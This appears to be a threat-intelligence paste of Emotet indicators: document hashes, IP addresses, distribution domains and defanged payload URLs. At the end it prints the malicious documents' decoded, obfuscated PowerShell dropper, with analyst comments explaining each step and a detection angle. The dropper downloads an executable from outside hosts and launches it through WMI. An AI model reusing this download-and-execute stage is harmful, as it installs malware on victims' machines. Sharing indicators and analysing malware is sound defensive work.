paladin316

Emotet_Doc_out_2020-07-28_11_57.txt

Jul 28th, 2020
  1. #Emotet #Docs #malware #OSINT #IOC
  2.  
  3. SHA256 (sample hashes; per the paste title these are the Emotet maldocs, not the downloaded EXE — confirm before using them as payload indicators):
  4.  
  5. ed41a46cc4cfbbc76641153afe9c02cc26886654483c01450293825d5f64904b
  6.  
  7. 7da491ebf960db553ac5406c952edb7e3f5edbf1c8a0cbac65e1ec1a7a0ee766
  8. 6e86292d81a588b8fe865c672d1d7a08e7466ece264415b74b100564e1b811e7
  9. 670d9f0b35181bf02a22246f4695c2bc2e4e056c636e3381916dc6fc35a2eaf8
  10. 1a22bc2d5ab7c96cd82e4506e49efae17bacd6124bba8f1ea167c8f6c18213bd
  11. 3150dba7885b3ffb68c46ff0998b7bbdf3fd3a08a2b1d1e3e8a9247f68f3073d
  12. 3394a8b91ea5b64a2595631b5c8a61a4dc428aced065ad0bf2fbb208c71f2fa1
  13. 6d0c01bf6407219c53a6c8d1d0e49c2dfb8e564ab8c8e8d43282b537184e2053
  14. de6e7651ff04fb8cac8811308974a0c63e8eaf94b2822a2756b904e010037d8d
  15. ae476dc84226859dea039560cb04e51ea1496660c3cf736699149189bf329ccf
  16. 4f553775f64c4b293f15951bff22a4e270365d94f25f5da89a09c1c0c053ca78
  17. 6c963e5f156a1997d05217dd2e95b78b3acc18dd0d021edef023bc2cf3da4f9f
  18. 7e172876169c7cb47adcb22277921cab0052b058ad5e74be410af83a2124ce78
  19. d5fcae8da6eb3ba0e7ec2cd8c0c7e483303cf86e330dba325033894e7b3dcb54
  20. 1a6d1ba1fd2cc8f3f4b5fa40d134e14a9943a5a7388411e51265991344390afd
  21. 023f4e503301706417dc3f41e97c80ea36b0b8cb13a6bc00033127f5f02cf3fb
  22. 7e367005096c8b3f267835a07445ee2da42934f0c812f5f04450433cbb749431
  23. c8ddfe93a33470e36d777cd8154d546ceac1f2b81b436b0b14c6d47cf8587db0
  24. 02a8d27299fc6e7b5683da67992da160a28ee1a8d16a6b283b1283b4b117c4b6
  25. 8f2eaf4202b4be0080f71fa8f59520f0fea9e9cd7665094a525da3b3f11503e6
  26. 433d6bb838d6c2b28b8ef3a372f22d9c88cd35ab4ae071fd7d922554d8abbeae
  27. ffcc77d43111d72c984db59cf32499affcf2cacef63bee20c75969a0e2b8eb59
  28. c0358342559bf99321e5442110b9321021b2b6ff793c9c1a2ee1da9211fe738b
  29. 09f7d48ed4d70c24ee8888b1ef67071cbca500ff3fe98267923a5ff68d113b28
  30. 8eec7fabc0058e0bdd126d4940cc9eb119bc517668d81d4e5bb837dec39c36be
  31. b0777df591af74e9a96ecc80891c896c182d02a61cddaa6a3a6a049df90cdf74
  32. c1b384454be18ab1bcb25dc31ee1a9432283f35544667066f60d88f2b292c53c
  33. 85c0054d03f6827fefa03852af4a9e70e6cdf01f74051e158525bf650780bac5
  34. 0a479543609c0a5dfd9da512221616a307fb608be96c70898e17e94481ede16f
  35. 91631b5f74221ef36cfacf1572e87d4a71c5876f16e20d1131401cf6f61f0c1e
  36. a0b0b8438cd5623e25d5a019dc04e367c058ca0333276f52bdf503e676e681f3
  37. e39269785585767c883341b5d3baebb1e7914575427027e4a1ab6e14982cc43f
  38. 23dc1dca99e2fac527a912b49c9a9585d5425e4266e8898d5a909e07c403c8d8
  39. 99fac314dd47a854ef8277c1789099edb56f00702532ca41dd2c761454ac40d1
  40. b55ef1a5bf7039156fc966f9ee6029eb34adfed07eb41513323dcb531f423a9e
  41. ac0c05258a76bf5ce28ac5288b36834125f716d074b84afc226730ff3e3e3632
  42. 8f2d832bd2b25d37066fcf493ac609353ba41357d61c018bf6937e553e1701f8
  43. 1617434d86067f8c03fc8acc0d383aff327510a0d3294d3607787075209f4a07
  44. 0b6408990b52722868cdfa9d182b4c82c6e63cb90ba34e9ad7095dbc7389b264
  45. af408c78c166c8cc2e8d5d4fae86a09948fc440b1479524e433c8d93238c4813
  46. 1a419986c2ddfd69b1fdf043700422a2df985707d6e03a7efe42ed182d630c66
  47. 3af0165cec5db6ff9ab6c18aa6ff4ee7752db47ea36c71ecab4e77c3da2d9935
  48. 97ff7c2c097cd943607c5fcf76feea7d24b42b35cb8abf7e380d0e3a7ebb9d2d
  49. 6c5d170321bd2c9bbf26d6d710485bc49663952dba2726292b8a2118390319ef
  50. 3fc0f7ff03bd442295279da349138760a0f3181e16cef998332720f6c509c32a
  51. cf253830c0484f6a93945b844e71d9d20ebe95c0a8e699fe12be87b07d04959e
  52. 63c221bc21f1b5720997bfa2d9edd61ca8f64a771ae9334a474b1f9a82017468
  53. 156df3a41550c999f475e13ac003b4a08360431dec19035610a316382ee375d9
  54. 8c34501d79ad72ce3d667b0207ccf20a512041cf3ff5b8c5b0a5226e6c5f9e05
  55. a89a0218a485d9fd640c38b6bef0bb9dfc80c74f6ee7b5a24bdb35b4a5b907c5
  56. 78eed1b4f1cfa761cdb70a2f13074b370f5cb7ae6b90d864928b6c378795f4fa
  57. ae3fe22384694c5fb3e90b4187e3766f58f0a7cacd0d60df5b5928b8cb380c69
  58. b6b016bba549ff7463a4291ace22f371939592d915ba8b62415e1095b83c5369
  59. acc24f2c82f75c03dcd793769b2370d4047ddc7d45a9a6259c45d0131601bd54
  60. 69eb7da9a7f1ab07ac5516128f0320cf4d805b95c4ef121cba44a49a9e582be4
  61. 3026d2a170c300a107ba8fc93c4a30219dbd9e888abafde4b08adf098416b010
  62.  
  63.  
  64. IPs (presumably what the distribution domains below resolved to at collection time; the hosts look like ordinary web servers, so confirm before blocking a possibly shared address):
  65. 107.190.129.106
  66. 162.241.193.129
  67. 173.255.128.163
  68. 203.98.95.116
  69. 66.198.240.56
  70.  
  71. Domains (payload hosts taken from the decoded dropper below):
  72.  
  73. benmedia.com
  74. sheilasteinfeld.com
  75. strange.info
  76. xsesa.com
  77. zmgmedia.com
  78.  
  79. Payload download URLs (defanged, hxxp = http; the dropper tries them in this order and stops at the first usable download):
  80. hxxp://zmgmedia.com/cgi-bin/zdJPC233/
  81. hxxp://xsesa.com/cgi-bin/d8l5149/
  82. hxxp://sheilasteinfeld.com/cgi-bin/rlD/
  83. hxxp://benmedia.com/assets/2ib5/
  84. hxxp://strange.info/cgi-bin/6EQ35998/
  85.  
  86.  
  87. Decoded Base64 PowerShell (the maldoc's download-and-execute stage; URLs are defanged and shown one per line here, whereas the script splits a single '*'-delimited string):
  # Analyst annotation (review): decoded Emotet PowerShell download-and-execute stage.
  # URLs are defanged (hxxp) as in the paste — do not refang and run this.
  # The comments only describe what the visible code does; the many throwaway
  # string assignments are never read again and serve as obfuscation padding.
  # NOTE(review): the five URLs are rendered one per line in this paste, but the
  # .spLit([char]42) call below implies the original is one '*'-joined string.
  88. $yoadkoybuattuux='quitluutzeij'; # dead variable (obfuscation padding)
  89. [Net.ServicePointManager]::"SEC`UrITY`PRO`T`oCOL" = 'tls12, tls11, tls'; # backtick-obfuscated 'SecurityProtocol'; allows TLS 1.0-1.2 for the download
  90. $diayruamgeoh = '368'; # filename stem of the dropped payload
  91. $cukpithnug='goodvuubweem'; # dead variable
  92. $fioxvaunbeey=$env:userprofile+'\'+$diayruamgeoh+'.exe'; # drop path: %USERPROFILE%\368.exe (user-writable location)
  93. $memxeuj='haurmeokheer'; # dead variable
  94. $hedbaphaub=.('ne'+'w'+'-objec'+'t') neT.WEBclIEnt; # obfuscated New-Object Net.WebClient
  95. $faelchoeh='hxxp://zmgmedia.com/cgi-bin/zdJPC233/
  96. hxxp://xsesa.com/cgi-bin/d8l5149/
  97. hxxp://sheilasteinfeld.com/cgi-bin/rlD/
  98. hxxp://benmedia.com/assets/2ib5/
  99. hxxp://strange.info/cgi-bin/6EQ35998/'."spL`it"([char]42); # obfuscated .Split('*') -> array of candidate payload URLs (no comments inside the string above: '#' would be literal)
  100. $couhfeobloej='boimgokhauj'; # dead variable
  # Detection angle (grounded in the next lines): powershell.exe writing an .exe into the
  # user-profile root, then spawning it through WMI Win32_Process.Create rather than Start-Process.
  101. foreach($woerzicvux in $faelchoeh){try{$hedbaphaub."D`OwnL`oaDfILe"($woerzicvux, $fioxvaunbeey); # try each URL in order: obfuscated WebClient.DownloadFile(url, dropPath)
  102. $xiodbuuvzew='jaiquthoey'; # dead variable
  103. If ((&('Ge'+'t-I'+'tem') $fioxvaunbeey)."LENG`Th" -ge 34717) {([wmiclass]'win32_Process')."c`REa`TE"($fioxvaunbeey); # size gate (>= 34717 bytes, likely to skip error pages / empty responses), then obfuscated Win32_Process.Create() launches the EXE via WMI
  104. $muandoacsub='xoektheoqu'; # dead variable
  105. break; # first successful download+launch ends the loop
  106. $thaiztop='detfeekwog'}}catch{}}$zaohchaekbom='yonciz' # catch{} swallows every download error and falls through to the next URL; trailing assignment is padding
  107.  